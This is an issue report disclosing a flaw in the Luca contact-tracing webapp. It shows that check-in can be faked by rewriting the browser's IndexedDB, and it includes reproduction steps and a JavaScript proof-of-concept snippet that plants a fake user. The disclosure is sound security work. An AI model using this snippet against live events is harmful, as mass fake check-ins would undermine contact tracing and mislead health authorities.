Project 'lu-ka/cve-2022-40799' was moved to 'rtfmkiesel/cve-2022-40799'. Please update any links and bookmarks that may still have the old path.
Issue created Apr 14, 2021 by Lasse Wolter@LasseWolter

Fake check-in without TAN possible

It's possible to check in to an event without entering any details on the webapp. The whole registration process can be circumvented by directly changing entries in the IndexedDB of the browser. This poses a massive problem as a malicious user can automate this process and populate an event with lots of fake data. Using a Selenium script, I was able to add 50 fake people to a private event (I created myself) within a couple of minutes.
If it's not clear already, the problem with lots of fake data is that it makes tracing actual key contacts infeasible or at least very time-consuming.

Steps to reproduce manually

  1. Get the meeting link from a QR code: e.g. https://app.luca-app.de/webapp/meeting/7dbb0796-c474-4c7b-baf3-dccb3ea233b0#eyJmbiI2ImV0r5QiLCJsbiI6InQifQ== (called Meeting_Link in the following)
  2. Go to the website referred to by the Meeting_Link
    • you should now arrive at a page where you are prompted to accept the terms and conditions, etc.
  3. Execute a snippet similar to the one below to populate a fake user.
  4. Enter the Meeting_Link in the URL bar and hit Enter.
  5. You'll now be checked in to the meeting as the fake user you just populated.

The following code is meant as a proof of concept. It was tested on Firefox (78.9.0esr) and Chrome (89.0.4389.114).
The basis for the snippet was taken from this article (https://developer.chrome.com/docs/devtools/storage/indexeddb/).

let request = indexedDB.open('luca', 33);
request.onsuccess = function(e) {
    let db = e.target.result;
    let trans = db.transaction(["users"], "readwrite");
    let userObjectStore = trans.objectStore('users');
    // Create a fake user
    const user = {
        firstName: 'Alice',
        lastName: 'Carter',
        version: '3', phoneNumber: '0123999445', email: '',
        street: 'jasonstreet', city: 'jennigton', houseNumber: '10', zip: 'zippy',
        userId: "1d7b4f55-5772-4bff-b9ea-9dc564836126"
    };

    // Clear db to get rid of current user
    userObjectStore.clear();

    // Add fake user to the db
    let request1 = userObjectStore.put(user);
    request1.onsuccess = function(e) {
        console.log('Added user');
    };
};

If you have any questions or need more evidence, let me know.

Edited Apr 14, 2021 by Lasse Wolter